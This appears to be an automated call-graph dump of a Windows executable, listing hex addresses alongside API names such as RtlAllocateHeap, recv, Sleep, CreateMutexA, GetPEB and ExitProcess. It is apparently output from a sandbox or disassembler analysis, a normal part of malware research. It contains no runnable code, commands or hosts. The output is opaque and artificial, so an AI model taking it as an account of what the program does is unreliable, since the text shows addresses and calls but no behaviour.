10616->10618 10617 783e9b shared_ptr 10617->10605 10618->10617 10619 7b6c6a RtlAllocateHeap 10618->10619 10620 783ec1 10619->10620 10629 7b3aed 10621->10629 10623 79b5a5 ___std_exception_copy 10636 79b1ad 10623->10636 10624 79b598 10632 79af56 10624->10632 10628 78242a 10628->10610 10640 7b4f29 10629->10640 10633 79af9f ___std_exception_copy 10632->10633 10635 79afb2 shared_ptr 10633->10635 10653 79b39f 10633->10653 10635->10628 10637 79b1d8 10636->10637 10638 79b1e1 shared_ptr 10636->10638 10639 79b39f 5 API calls 10637->10639 10638->10628 10639->10638 10648 7b4f37 10640->10648 10642 79b555 10642->10623 10642->10624 10642->10628 10643 7b4f2e __cftof 10643->10642 10644 7bd634 __cftof 4 API calls 10643->10644 10646 7b8bfc ___std_exception_copy 10643->10646 10644->10646 10645 7b65ed __cftof 3 API calls 10647 7b8c2f 10645->10647 10646->10645 10649 7b4f40 10648->10649 10651 7b4f43 10648->10651 10649->10643 10650 7b4f77 10650->10643 10651->10650 10652 7b8ba3 ___std_exception_destroy RtlAllocateHeap 10651->10652 10652->10650 10664 79bedf 10653->10664 10656 79b3e8 10656->10635 10673 79cc31 10664->10673 10667 7b6cbb 10668 7b6cc7 __cftof 10667->10668 10669 7ba671 __cftof 4 API calls 10668->10669 10672 7b6ccc 10669->10672 10670 7b8bec __cftof 4 API calls 10671 7b6cf6 10670->10671 10672->10670 10674 79cc3f InitOnceExecuteOnce 10673->10674 10676 79b3e1 10673->10676 10674->10676 10676->10656 10676->10667 10678 797dcb 10677->10678 10679 797d62 10677->10679 10680 782480 RtlAllocateHeap 10678->10680 10681 797d6d 10679->10681 10682 797d9c 10679->10682 10684 797d7a 10680->10684 10681->10678 10685 797d74 10681->10685 10683 797db9 10682->10683 10687 79d3e2 RtlAllocateHeap 10682->10687 10683->10613 10688 7b6c6a RtlAllocateHeap 10684->10688 10690 797d83 10684->10690 10686 79d3e2 RtlAllocateHeap 10685->10686 10686->10684 10689 797da6 10687->10689 10696 797dd5 10688->10696 10689->10613 10690->10613 10691 797f20 10692 799270 RtlAllocateHeap 10691->10692 10705 797e91 __cftof 10692->10705 10693 797e01 10693->10613 10694 7b6c6a RtlAllocateHeap 10703 797f2a __cftof 10694->10703 10695 797f1b 10699 782480 RtlAllocateHeap 10695->10699 10696->10691 10696->10693 10696->10695 10697 797e80 10696->10697 10698 797ea7 10696->10698 10697->10695 10700 797e8b 10697->10700 10701 79d3e2 RtlAllocateHeap 10698->10701 10698->10705 10699->10691 10702 79d3e2 RtlAllocateHeap 10700->10702 10701->10705 10702->10705 10704 797f61 shared_ptr 10703->10704 10707 7b6c6a RtlAllocateHeap 10703->10707 10704->10613 10705->10694 10706 797f02 shared_ptr 10705->10706 10706->10613 10708 797f7c 10707->10708 10754 79be50 10757 79bd8b 10754->10757 10756 79be66 std::_Throw_future_error 10758 7822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10757->10758 10759 79bd9f 10758->10759 10759->10756 9728 78a856 9729 78a870 9728->9729 9736 78a892 shared_ptr 9728->9736 9730 78a94e 9729->9730 9729->9736 9732 78a953 Sleep CreateMutexA 9730->9732 9752 7b6c6a 9730->9752 9735 78a98e 9732->9735 9734 78a903 9737 7980c0 9736->9737 9741 7980de 9737->9741 9742 798104 9737->9742 9738 7981ee 9760 799270 9738->9760 9740 7981f3 9763 782480 9740->9763 9741->9734 9742->9738 9744 798158 9742->9744 9745 79817d 9742->9745 9744->9740 9755 79d3e2 9744->9755 9748 79d3e2 RtlAllocateHeap 9745->9748 9749 798169 __cftof 9745->9749 9748->9749 9750 7b6c6a RtlAllocateHeap 9749->9750 9751 7981d0 shared_ptr 9749->9751 9750->9738 9751->9734 9753 7b6bf6 ___std_exception_copy RtlAllocateHeap 9752->9753 9754 7b6c79 ___std_exception_copy 9753->9754 9756 782480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9755->9756 9759 79d401 std::_Throw_future_error 9756->9759 9767 7b38af 9756->9767 9759->9749 9856 79c1b9 9760->9856 9764 78248e std::_Throw_future_error 9763->9764 9765 7b38af ___std_exception_copy RtlAllocateHeap 9764->9765 9766 7824c3 9765->9766 9768 7b38bc ___std_exception_copy 9767->9768 9772 7824c3 9767->9772 9769 7b38e9 9768->9769 9768->9772 9773 7ba1f1 9768->9773 9782 7b8ba3 9769->9782 9772->9749 9774 7ba20c 9773->9774 9775 7ba1fe 9773->9775 9785 7b75f6 9774->9785 9775->9774 9777 7ba223 9775->9777 9779 7ba21e 9777->9779 9780 7b75f6 __dosmaperr RtlAllocateHeap 9777->9780 9779->9769 9781 7ba214 9780->9781 9788 7b6c5a 9781->9788 9783 7badf5 __freea RtlAllocateHeap 9782->9783 9784 7b8bbb 9783->9784 9784->9772 9791 7ba7c8 9785->9791 9850 7b6bf6 9788->9850 9790 7b6c66 9790->9779 9792 7ba7d2 __dosmaperr 9791->9792 9794 7b75fb 9792->9794 9802 7bd82f 9792->9802 9794->9781 9795 7ba813 __dosmaperr 9796 7ba81b __dosmaperr 9795->9796 9797 7ba853 9795->9797 9806 7badf5 9796->9806 9810 7ba49f 9797->9810 9801 7badf5 __freea RtlAllocateHeap 9801->9794 9803 7bd83c __dosmaperr 9802->9803 9804 7bd867 RtlAllocateHeap 9803->9804 9805 7bd87a __dosmaperr 9803->9805 9804->9803 9804->9805 9805->9795 9807 7bae00 9806->9807 9809 7bae1b __dosmaperr 9806->9809 9808 7b75f6 __dosmaperr RtlAllocateHeap 9807->9808 9807->9809 9808->9809 9809->9794 9811 7ba50d __dosmaperr 9810->9811 9814 7ba445 9811->9814 9813 7ba536 9813->9801 9815 7ba451 __cftof 9814->9815 9818 7ba626 9815->9818 9817 7ba473 __dosmaperr 9817->9813 9819 7ba635 __dosmaperr 9818->9819 9821 7ba65c __dosmaperr 9818->9821 9819->9821 9822 7bf35f 9819->9822 9821->9817 9824 7bf3df 9822->9824 9825 7bf375 9822->9825 9823 7bf4d0 __dosmaperr RtlAllocateHeap 9831 7bf43b 9823->9831 9826 7badf5 __freea RtlAllocateHeap 9824->9826 9849 7bf42d 9824->9849 9825->9824 9830 7badf5 __freea RtlAllocateHeap 9825->9830 9832 7bf3a8 9825->9832 9827 7bf401 9826->9827 9828 7badf5 __freea RtlAllocateHeap 9827->9828 9833 7bf414 9828->9833 9829 7badf5 __freea RtlAllocateHeap 9834 7bf3d4 9829->9834 9836 7bf39d 9830->9836 9835 7bf49b 9831->9835 9842 7badf5 RtlAllocateHeap __freea 9831->9842 9837 7badf5 __freea RtlAllocateHeap 9832->9837 9848 7bf3ca 9832->9848 9838 7badf5 __freea RtlAllocateHeap 9833->9838 9839 7badf5 __freea RtlAllocateHeap 9834->9839 9840 7badf5 __freea RtlAllocateHeap 9835->9840 9841 7bef3c ___free_lconv_mon RtlAllocateHeap 9836->9841 9843 7bf3bf 9837->9843 9844 7bf422 9838->9844 9839->9824 9845 7bf4a1 9840->9845 9841->9832 9842->9831 9846 7bf03a __dosmaperr RtlAllocateHeap 9843->9846 9847 7badf5 __freea RtlAllocateHeap 9844->9847 9845->9821 9846->9848 9847->9849 9848->9829 9849->9823 9851 7ba7c8 __dosmaperr RtlAllocateHeap 9850->9851 9852 7b6c01 ___std_exception_copy 9851->9852 9853 7b6bf6 ___std_exception_copy RtlAllocateHeap 9852->9853 9854 7b6c0f 9852->9854 9855 7b6c66 9853->9855 9854->9790 9855->9790 9859 79c123 9856->9859 9858 79c1ca std::_Throw_future_error 9862 7822e0 9859->9862 9861 79c135 9861->9858 9863 7b38af ___std_exception_copy RtlAllocateHeap 9862->9863 9864 782317 std::invalid_argument::invalid_argument 9863->9864 9864->9861 10796 783440 10801 782b30 10796->10801 10798 78344f std::_Throw_future_error 10799 7b38af ___std_exception_copy RtlAllocateHeap 10798->10799 10800 783483 10799->10800 10802 7b38af ___std_exception_copy RtlAllocateHeap 10801->10802 10803 782b68 std::invalid_argument::invalid_argument 10802->10803 10803->10798 10783 783840 10784 7838f6 10783->10784 10786 78385f 10783->10786 10785 783920 10793 7991e0 10785->10793 10786->10784 10786->10785 10788 7838cd shared_ptr 10786->10788 10791 78391b 10786->10791 10790 797d50 RtlAllocateHeap 10788->10790 10789 783925 10790->10784 10792 7b6c6a RtlAllocateHeap 10791->10792 10792->10785 10794 79c1b9 RtlAllocateHeap 10793->10794 10795 7991ea 10794->10795 10795->10789 10824 783c47 10825 783c51 10824->10825 10828 783c5f 10825->10828 10840 7832d0 10825->10840 10826 783c68 10828->10826 10859 783810 10828->10859 10863 79c6ac 10840->10863 10842 78336b 10869 79c26a 10842->10869 10845 78333c __Mtx_unlock 10846 79c26a 5 API calls 10845->10846 10848 783350 std::invalid_argument::invalid_argument 10845->10848 10849 783377 10846->10849 10847 783314 10847->10842 10847->10845 10866 79bd4c 10847->10866 10848->10828 10850 79c6ac GetSystemTimePreciseAsFileTime 10849->10850 10851 7833af 10850->10851 10852 79c26a 5 API calls 10851->10852 10853 7833b6 __Cnd_broadcast 10851->10853 10852->10853 10854 79c26a 5 API calls 10853->10854 10855 7833d7 __Mtx_unlock 10853->10855 10854->10855 10856 79c26a 5 API calls 10855->10856 10857 7833eb 10855->10857 10858 78340e 10856->10858 10857->10828 10858->10828 10860 78381c 10859->10860 10942 782440 10860->10942 10873 79c452 10863->10873 10865 79c6b9 10865->10847 10890 79bb72 10866->10890 10868 79bd5c 10868->10847 10870 79c292 10869->10870 10871 79c274 10869->10871 10870->10870 10871->10870 10896 79c297 10871->10896 10874 79c4a8 10873->10874 10876 79c47a std::invalid_argument::invalid_argument 10873->10876 10874->10876 10879 79cf6b 10874->10879 10876->10865 10877 79c4fd __Xtime_diff_to_millis2 10877->10876 10878 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10877->10878 10878->10877 10880 79cf7a 10879->10880 10882 79cf87 __aulldvrm 10879->10882 10880->10882 10883 79cf44 10880->10883 10882->10877 10886 79cbea 10883->10886 10887 79cbfb GetSystemTimePreciseAsFileTime 10886->10887 10888 79cc07 10886->10888 10887->10888 10888->10882 10891 79bb9c 10890->10891 10892 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10891->10892 10895 79bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10891->10895 10893 79bbcf __Xtime_diff_to_millis2 10892->10893 10894 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10893->10894 10893->10895 10894->10895 10895->10868 10901 782ae0 10896->10901 10898 79c2ae 10908 79c1ff 10898->10908 10900 79c2bf std::_Throw_future_error 10902 79bedf InitOnceExecuteOnce 10901->10902 10903 782af4 __cftof 10902->10903 10903->10898 10904 7ba671 __cftof 4 API calls 10903->10904 10907 7b6ccc 10904->10907 10905 7b8bec __cftof 4 API calls 10906 7b6cf6 10905->10906 10907->10905 10909 79c20b __EH_prolog3_GS 10908->10909 10910 7980c0 RtlAllocateHeap 10909->10910 10911 79c23d 10910->10911 10916 7826b0 10911->10916 10913 79c252 10933 797970 10913->10933 10915 79c25a 10915->10900 10917 797a00 RtlAllocateHeap 10916->10917 10918 782702 10917->10918 10919 782725 10918->10919 10920 798f40 RtlAllocateHeap 10918->10920 10921 798f40 RtlAllocateHeap 10919->10921 10922 78278e 10919->10922 10920->10919 10921->10922 10923 7827ed shared_ptr 10922->10923 10925 7828b8 10922->10925 10924 7b38af ___std_exception_copy RtlAllocateHeap 10923->10924 10928 78284b 10924->10928 10926 7b6c6a RtlAllocateHeap 10925->10926 10926->10928 10927 78287a shared_ptr std::invalid_argument::invalid_argument 10927->10913 10928->10927 10929 7b6c6a RtlAllocateHeap 10928->10929 10930 7828c2 10929->10930 10938 7b3912 10930->10938 10932 7828e5 shared_ptr 10932->10913 10934 79797b 10933->10934 10935 797996 shared_ptr 10933->10935 10934->10935 10936 7b6c6a RtlAllocateHeap 10934->10936 10935->10915 10937 7979ba 10936->10937 10939 7b391f 10938->10939 10940 7b3926 10938->10940 10941 7b8ba3 ___std_exception_destroy RtlAllocateHeap 10939->10941 10940->10932 10941->10940 10945 79b5d6 10942->10945 10944 782472 10947 79b5f1 std::_Throw_future_error 10945->10947 10946 7b8bec __cftof 4 API calls 10948 79b69f 10946->10948 10947->10946 10949 79b658 __cftof std::invalid_argument::invalid_argument 10947->10949 10949->10944 10950 7b6a44 10951 7b6a5c 10950->10951 10952 7b6a52 10950->10952 10968 7b698d 10951->10968 10963 7bb655 10952->10963 10955 7b6a59 10956 7b6a76 10971 7b68ed 10956->10971 10958 7b6a8a 10961 7b6aa8 10958->10961 10962 7badf5 __freea RtlAllocateHeap 10958->10962 10960 7bb655 RtlAllocateHeap 10960->10958 10962->10961 10964 7bb662 10963->10964 10965 7bb679 10964->10965 10974 7b75c0 10964->10974 10965->10955 10969 7b690a __cftof 4 API calls 10968->10969 10970 7b699f 10969->10970 10970->10956 10982 7b683b 10971->10982 10979 7b75e3 10974->10979 10976 7b75cb __dosmaperr 10977 7b75f6 __dosmaperr RtlAllocateHeap 10976->10977 10978 7b75de 10977->10978 10978->10955 10980 7ba7c8 __dosmaperr RtlAllocateHeap 10979->10980 10981 7b75e8 10980->10981 10981->10976 10983 7b6849 10982->10983 10984 7b6863 10982->10984 10995 7b69cc 10983->10995 10986 7b686a 10984->10986 10988 7b6889 __cftof 10984->10988 10994 7b6853 10986->10994 10999 7b69e6 10986->10999 10989 7b69e6 RtlAllocateHeap 10988->10989 10991 7b689f __cftof 10988->10991 10989->10991 10990 7b75c0 __dosmaperr RtlAllocateHeap 10992 7b68ab 10990->10992 10991->10990 10991->10994 10993 7b75f6 __dosmaperr RtlAllocateHeap 10992->10993 10993->10994 10994->10958 10994->10960 10996 7b69d7 10995->10996 10997 7b69df 10995->10997 10998 7badf5 __freea RtlAllocateHeap 10996->10998 10997->10994 10998->10997 11000 7b69cc RtlAllocateHeap 10999->11000 11001 7b69f4 11000->11001 11004 7b6a25 11001->11004 11005 7bb04b __cftof RtlAllocateHeap 11004->11005 11006 7b6a05 11005->11006 11006->10994 9708 7b6629 9711 7b64c7 9708->9711 9712 7b64d5 __cftof 9711->9712 9713 7b6520 9712->9713 9716 7b652b 9712->9716 9715 7b652a 9722 7ba302 GetPEB 9716->9722 9718 7b6535 9719 7b653a GetPEB 9718->9719 9720 7b654a __cftof 9718->9720 9719->9720 9721 7b6562 ExitProcess 9720->9721 9723 7ba31c __cftof 9722->9723 9723->9718 9724 7bd82f 9725 7bd83c __dosmaperr 9724->9725 9726 7bd867 RtlAllocateHeap 9725->9726 9727 7bd87a __dosmaperr 9725->9727 9726->9725 9726->9727 11023 781020 11024 7980c0 RtlAllocateHeap 11023->11024 11025 781031 11024->11025 11026 79d64e RtlAllocateHeap 11025->11026 11027 78103b 11026->11027 11053 78a418 11056 78a420 shared_ptr 11053->11056 11054 78a4f3 shared_ptr 11059 7980c0 RtlAllocateHeap 11054->11059 11055 78a93f 11057 7b6c6a RtlAllocateHeap 11055->11057 11056->11054 11056->11055 11058 78a944 11057->11058 11060 7b6c6a RtlAllocateHeap 11058->11060 11061 78a903 11059->11061 11062 78a949 11060->11062 11063 78a94e 11062->11063 11064 7b6c6a RtlAllocateHeap 11062->11064 11065 78a953 Sleep CreateMutexA 11063->11065 11066 7b6c6a RtlAllocateHeap 11063->11066 11064->11063 11067 78a98e 11065->11067 11066->11065 11104 782e00 11105 782e28 11104->11105 11108 79c68b 11105->11108 11111 79c3d5 11108->11111 11110 782e33 11112 79c3eb 11111->11112 11113 79c3e1 11111->11113 11112->11110 11114 79c3be 11113->11114 11115 79c39e 11113->11115 11124 79cd0a 11114->11124 11115->11112 11120 79ccd5 11115->11120 11118 79c3d0 11118->11110 11121 79c3b7 11120->11121 11122 79cce3 InitializeCriticalSectionEx 11120->11122 11121->11110 11122->11121 11125 79cd1f RtlInitializeConditionVariable 11124->11125 11125->11118 11126 781000 11127 79d64e RtlAllocateHeap 11126->11127 11128 78100a 11127->11128 11139 799ef0 11140 799f0c 11139->11140 11141 79c68b __Mtx_init_in_situ 2 API calls 11140->11141 11142 799f17 11141->11142 11143 7c44f2 11144 7c450c 11143->11144 11145 7c44ff 11143->11145 11147 7c4518 11144->11147 11148 7b75f6 __dosmaperr RtlAllocateHeap 11144->11148 11146 7b75f6 __dosmaperr RtlAllocateHeap 11145->11146 11149 7c4504 11146->11149 11150 7c4539 11148->11150 11151 7b6c5a ___std_exception_copy RtlAllocateHeap 11150->11151 11151->11149 11152 786ae9 11155 786b01 11152->11155 11153 7980c0 RtlAllocateHeap 11154 786bac 11153->11154 11156 799280 RtlAllocateHeap 11154->11156 11155->11153 11157 786bbd shared_ptr 11155->11157 11156->11157 11158 7980c0 RtlAllocateHeap 11157->11158 11159 786ce3 shared_ptr std::invalid_argument::invalid_argument 11158->11159 11208 789adc 11212 789aea shared_ptr 11208->11212 11209 78a917 11210 78a953 Sleep CreateMutexA 11209->11210 11211 7b6c6a RtlAllocateHeap 11209->11211 11219 78a98e 11210->11219 11211->11210 11212->11209 11213 789b4b shared_ptr 11212->11213 11214 789b59 11213->11214 11215 789b65 11213->11215 11218 7980c0 RtlAllocateHeap 11214->11218 11216 797a00 RtlAllocateHeap 11215->11216 11217 789b74 11216->11217 11220 785c10 4 API calls 11217->11220 11221 78a903 11218->11221 11222 789b7c 11220->11222 11235 788b30 11222->11235 11224 789b8d 11225 798220 RtlAllocateHeap 11224->11225 11226 789b9c 11225->11226 11227 797a00 RtlAllocateHeap 11226->11227 11228 789ca9 11227->11228 11229 785c10 4 API calls 11228->11229 11230 789cb1 11229->11230 11231 788b30 4 API calls 11230->11231 11232 789cc2 11231->11232 11233 798220 RtlAllocateHeap 11232->11233 11234 789cd1 11233->11234 11236 788b7c 11235->11236 11237 797a00 RtlAllocateHeap 11236->11237 11238 788b8c 11237->11238 11239 785c10 4 API calls 11238->11239 11240 788b97 11239->11240 11241 7980c0 RtlAllocateHeap 11240->11241 11242 788be3 11241->11242 11243 7980c0 RtlAllocateHeap 11242->11243 11244 788c35 11243->11244 11245 798220 RtlAllocateHeap 11244->11245 11248 788c47 shared_ptr 11245->11248 11246 788d01 shared_ptr std::invalid_argument::invalid_argument 11246->11224 11247 7b6c6a RtlAllocateHeap 11249 788d2d 11247->11249 11248->11246 11248->11247 11250 797a00 RtlAllocateHeap 11249->11250 11251 788d8f 11250->11251 11252 785c10 4 API calls 11251->11252 11253 788d9a 11252->11253 11254 7980c0 RtlAllocateHeap 11253->11254 11255 788dec 11254->11255 11256 798220 RtlAllocateHeap 11255->11256 11258 788dfe shared_ptr 11256->11258 11257 788e7e shared_ptr std::invalid_argument::invalid_argument 11257->11224 11258->11257 11259 7b6c6a RtlAllocateHeap 11258->11259 11260 788eaa 11259->11260 11261 797a00 RtlAllocateHeap 11260->11261 11262 788f0f 11261->11262 11263 785c10 4 API calls 11262->11263 11264 788f1a 11263->11264 11265 7980c0 RtlAllocateHeap 11264->11265 11266 788f6c 11265->11266 11267 798220 RtlAllocateHeap 11266->11267 11269 788f7e shared_ptr 11267->11269 11268 788ffe shared_ptr std::invalid_argument::invalid_argument 11268->11224 11269->11268 11270 7b6c6a RtlAllocateHeap 11269->11270 11271 78902a 11270->11271 11297 78e0c0 recv 11298 78e122 recv 11297->11298 11299 78e157 recv 11298->11299 11300 78e191 11299->11300 11301 78e2b3 std::invalid_argument::invalid_argument 11300->11301 11302 79c6ac GetSystemTimePreciseAsFileTime 11300->11302 11303 78e2ee 11302->11303 11304 79c26a 5 API calls 11303->11304 11305 78e358 11304->11305 11306 782ec0 11307 782f06 11306->11307 11310 782f6f 11306->11310 11308 79c6ac GetSystemTimePreciseAsFileTime 11307->11308 11309 782f12 11308->11309 11312 782f1d 11309->11312 11313 78301e 11309->11313 11311 782fef 11310->11311 11319 79c6ac GetSystemTimePreciseAsFileTime 11310->11319 11316 79d3e2 RtlAllocateHeap 11312->11316 11318 782f30 __Mtx_unlock 11312->11318 11314 79c26a 5 API calls 11313->11314 11315 783024 11314->11315 11317 79c26a 5 API calls 11315->11317 11316->11318 11320 782fb9 11317->11320 11318->11310 11318->11315 11319->11320 11321 79c26a 5 API calls 11320->11321 11322 782fc0 __Mtx_unlock 11320->11322 11321->11322 11323 79c26a 5 API calls 11322->11323 11324 782fd8 __Cnd_broadcast 11322->11324 11323->11324 11324->11311 11325 79c26a 5 API calls 11324->11325 11326 78303c 11325->11326 11327 79c6ac GetSystemTimePreciseAsFileTime 11326->11327 11337 783080 shared_ptr __Mtx_unlock 11327->11337 11328 7831c5 11329 79c26a 5 API calls 11328->11329 11330 7831cb 11329->11330 11331 79c26a 5 API calls 11330->11331 11332 7831d1 11331->11332 11333 79c26a 5 API calls 11332->11333 11339 783193 __Mtx_unlock 11333->11339 11334 7831a7 std::invalid_argument::invalid_argument 11335 79c26a 5 API calls 11336 7831dd 11335->11336 11337->11328 11337->11330 11337->11334 11338 79c6ac GetSystemTimePreciseAsFileTime 11337->11338 11340 78315f 11338->11340 11339->11334 11339->11335 11340->11328 11340->11332 11340->11339 11341 79bd4c GetSystemTimePreciseAsFileTime 11340->11341 11341->11340 11362 79d0c7 11364 79d0d7 11362->11364 11363 79d17f 11364->11363 11365 79d17b RtlWakeAllConditionVariable 11364->11365 11366 789ab8 11368 789acc 11366->11368 11369 789b08 11368->11369 11370 789b4b shared_ptr 11369->11370 11373 78a917 11369->11373 11371 789b59 11370->11371 11372 789b65 11370->11372 11376 7980c0 RtlAllocateHeap 11371->11376 11374 797a00 RtlAllocateHeap 11372->11374 11377 78a953 Sleep CreateMutexA 11373->11377 11378 7b6c6a RtlAllocateHeap 11373->11378 11375 789b74 11374->11375 11379 785c10 4 API calls 11375->11379 11380 78a903 11376->11380 11382 78a98e 11377->11382 11378->11377 11381 789b7c 11379->11381 11383 788b30 4 API calls 11381->11383 11384 789b8d 11383->11384 11385 798220 RtlAllocateHeap 11384->11385 11386 789b9c 11385->11386 11387 797a00 RtlAllocateHeap 11386->11387 11388 789ca9 11387->11388 11389 785c10 4 API calls 11388->11389 11390 789cb1 11389->11390 11391 788b30 4 API calls 11390->11391 11392 789cc2 11391->11392 11393 798220 RtlAllocateHeap 11392->11393 11394 789cd1 11393->11394 11395 7842b0 11398 783ac0 11395->11398 11397 7842bb shared_ptr 11399 783af9 11398->11399 11400 7b6c6a RtlAllocateHeap 11399->11400 11406 783b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11399->11406 11401 783be6 11400->11401 11403 7832d0 6 API calls 11401->11403 11404 783c38 11401->11404 11402 7832d0 6 API calls 11407 783c5f 11402->11407 11403->11404 11404->11402 11404->11407 11405 783c68 11405->11397 11406->11397 11407->11405 11408 783810 4 API calls 11407->11408 11409 783cdb 11408->11409 11410 797d50 RtlAllocateHeap 11409->11410 11411 783d52 11409->11411 11410->11411 11412 79d3e2 RtlAllocateHeap 11411->11412 11413 783d84 11412->11413 11414 797d50 RtlAllocateHeap 11413->11414 11415 783e03 11413->11415 11414->11415 11416 783e9b shared_ptr 11415->11416 11417 7b6c6a RtlAllocateHeap 11415->11417 11416->11397 11418 783ec1 11417->11418 11419 785cad 11421 785caf 11419->11421 11420 785d17 shared_ptr std::invalid_argument::invalid_argument 11421->11420 11422 7b6c6a RtlAllocateHeap 11421->11422 11423 785d47 __cftof 11422->11423 11423->11423 11424 7980c0 RtlAllocateHeap 11423->11424 11426 785e3e 11424->11426 11425 785ea6 shared_ptr std::invalid_argument::invalid_argument 11426->11425 11427 7b6c6a RtlAllocateHeap 11426->11427 11428 785ed2 11427->11428 11429 785ffe shared_ptr std::invalid_argument::invalid_argument 11428->11429 11430 7b6c6a RtlAllocateHeap 11428->11430 11431 78601b 11430->11431 11432 7980c0 RtlAllocateHeap 11431->11432 11433 786089 11432->11433 11434 7980c0 RtlAllocateHeap 11433->11434 11435 7860bd 11434->11435 11436 7980c0 RtlAllocateHeap 11435->11436 11437 7860ee 11436->11437 11438 7980c0 RtlAllocateHeap 11437->11438 11439 78611f 11438->11439 11440 7980c0 RtlAllocateHeap 11439->11440 11442 786150 11440->11442 11441 7865b1 shared_ptr std::invalid_argument::invalid_argument 11442->11441 11443 7b6c6a RtlAllocateHeap 11442->11443 11444 7865dc 11443->11444 11445 797a00 RtlAllocateHeap 11444->11445 11446 7866a6 11445->11446 11447 785c10 4 API calls 11446->11447 11448 7866ac 11447->11448 11449 785c10 4 API calls 11448->11449 11450 7866b1 11449->11450 11451 7822c0 4 API calls 11450->11451 11452 7866c9 shared_ptr 11451->11452 11453 797a00 RtlAllocateHeap 11452->11453 11454 786732 11453->11454 11455 785c10 4 API calls 11454->11455 11456 78673d 11455->11456 11457 7822c0 4 API calls 11456->11457 11466 786757 shared_ptr 11457->11466 11458 786852 11459 7980c0 RtlAllocateHeap 11458->11459 11461 78689c 11459->11461 11460 797a00 RtlAllocateHeap 11460->11466 11462 7980c0 RtlAllocateHeap 11461->11462 11464 7868e3 shared_ptr std::invalid_argument::invalid_argument 11462->11464 11463 785c10 4 API calls 11463->11466 11465 7822c0 4 API calls 11465->11466 11466->11458 11466->11460 11466->11463 11466->11465 11507 7820a0 11508 79c68b __Mtx_init_in_situ 2 API calls 11507->11508 11509 7820ac 11508->11509 11510 79d64e RtlAllocateHeap 11509->11510 11511 7820b6 11510->11511 11512 7834a0 11513 7834aa 11512->11513 11514 7834ca shared_ptr 11512->11514 11513->11514 11515 7b6c6a RtlAllocateHeap 11513->11515 11516 7834f2 Concurrency::cancel_current_task shared_ptr 11515->11516 11517 785a9e 11520 785a61 11517->11520 11518 7980c0 RtlAllocateHeap 11518->11520 11520->11517 11520->11518 11521 797a00 RtlAllocateHeap 11520->11521 11522 785bdd std::invalid_argument::invalid_argument 11520->11522 11523 785730 11520->11523 11521->11520 11529 785860 shared_ptr 11523->11529 11531 785799 shared_ptr 11523->11531 11524 78592a 11532 798200 11524->11532 11525 7980c0 RtlAllocateHeap 11525->11531 11527 785900 shared_ptr std::invalid_argument::invalid_argument 11527->11520 11528 7b6c6a RtlAllocateHeap 11530 785934 11528->11530 11529->11527 11529->11528 11531->11524 11531->11525 11531->11529 11535 79c1d9 11532->11535 11534 79820a 11538 79c15d 11535->11538 11537 79c1ea std::_Throw_future_error 11537->11534 11539 7822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11538->11539 11540 79c16f 11539->11540 11540->11537 11548 783c8e 11549 783c98 11548->11549 11550 783cb4 11549->11550 11551 782410 5 API calls 11549->11551 11554 783810 4 API calls 11550->11554 11552 783ca5 11551->11552 11553 783ce0 RtlAllocateHeap 11552->11553 11553->11550 11555 783ccf 11554->11555 11556 783810 4 API calls 11555->11556 11557 783cdb 11556->11557 11558 797d50 RtlAllocateHeap 11557->11558 11559 783d52 11557->11559 11558->11559 11560 79d3e2 RtlAllocateHeap 11559->11560 11561 783d84 11560->11561 11562 797d50 RtlAllocateHeap 11561->11562 11563 783e03 11561->11563 11562->11563 11564 783e9b shared_ptr 11563->11564 11565 7b6c6a RtlAllocateHeap 11563->11565 11566 783ec1 11565->11566 11607 798680 11608 7986e0 11607->11608 11608->11608 11616 797760 11608->11616 11610 7986f9 11611 798f40 RtlAllocateHeap 11610->11611 11612 798714 11610->11612 11611->11612 11613 798f40 RtlAllocateHeap 11612->11613 11615 798769 11612->11615 11614 7987b1 11613->11614 11618 79777b 11616->11618 11629 797864 shared_ptr __cftof 11616->11629 11617 7978f1 11619 799270 RtlAllocateHeap 11617->11619 11618->11617 11621 7977fb __cftof 11618->11621 11622 7977ea 11618->11622 11623 797811 11618->11623 11618->11629 11620 7978f6 11619->11620 11624 782480 RtlAllocateHeap 11620->11624 11628 7b6c6a RtlAllocateHeap 11621->11628 11621->11629 11622->11620 11626 79d3e2 RtlAllocateHeap 11622->11626 11623->11621 11627 79d3e2 RtlAllocateHeap 11623->11627 11625 7978fb 11624->11625 11626->11621 11627->11621 11628->11617 11629->11610 11630 78a682 11631 78a68a shared_ptr 11630->11631 11632 78a75d shared_ptr 11631->11632 11633 78a949 11631->11633 11638 7980c0 RtlAllocateHeap 11632->11638 11634 78a94e 11633->11634 11635 7b6c6a RtlAllocateHeap 11633->11635 11636 78a953 Sleep CreateMutexA 11634->11636 11637 7b6c6a RtlAllocateHeap 11634->11637 11635->11634 11640 78a98e 11636->11640 11637->11636 11639 78a903 11638->11639 11641 783970 11642 79c68b __Mtx_init_in_situ 2 API calls 11641->11642 11643 7839a7 11642->11643 11644 79c68b __Mtx_init_in_situ 2 API calls 11643->11644 11645 7839e6 11644->11645 11646 782170 11651 79c6fc 11646->11651 11649 79d64e RtlAllocateHeap 11650 782184 11649->11650 11652 79c70c 11651->11652 11653 78217a 11651->11653 11652->11653 11655 79cfbe 11652->11655 11653->11649 11656 79ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11655->11656 11657 79cfd0 11656->11657 11657->11652 11658 783770 11660 78379b 11658->11660 11659 7837cd shared_ptr 11660->11659 11661 7b6c6a RtlAllocateHeap 11660->11661 11662 78380f 11661->11662 11663 785f76 11665 785f81 shared_ptr 11663->11665 11664 785ffe shared_ptr std::invalid_argument::invalid_argument 11665->11664 11666 7b6c6a RtlAllocateHeap 11665->11666 11667 78601b 11666->11667 11668 7980c0 RtlAllocateHeap 11667->11668 11669 786089 11668->11669 11670 7980c0 RtlAllocateHeap 11669->11670 11671 7860bd 11670->11671 11672 7980c0 RtlAllocateHeap 11671->11672 11673 7860ee 11672->11673 11674 7980c0 RtlAllocateHeap 11673->11674 11675 78611f 11674->11675 11676 7980c0 RtlAllocateHeap 11675->11676 11678 786150 11676->11678 11677 7865b1 shared_ptr std::invalid_argument::invalid_argument 11678->11677 11679 7b6c6a RtlAllocateHeap 11678->11679 11680 7865dc 11679->11680 11681 797a00 RtlAllocateHeap 11680->11681 11682 7866a6 11681->11682 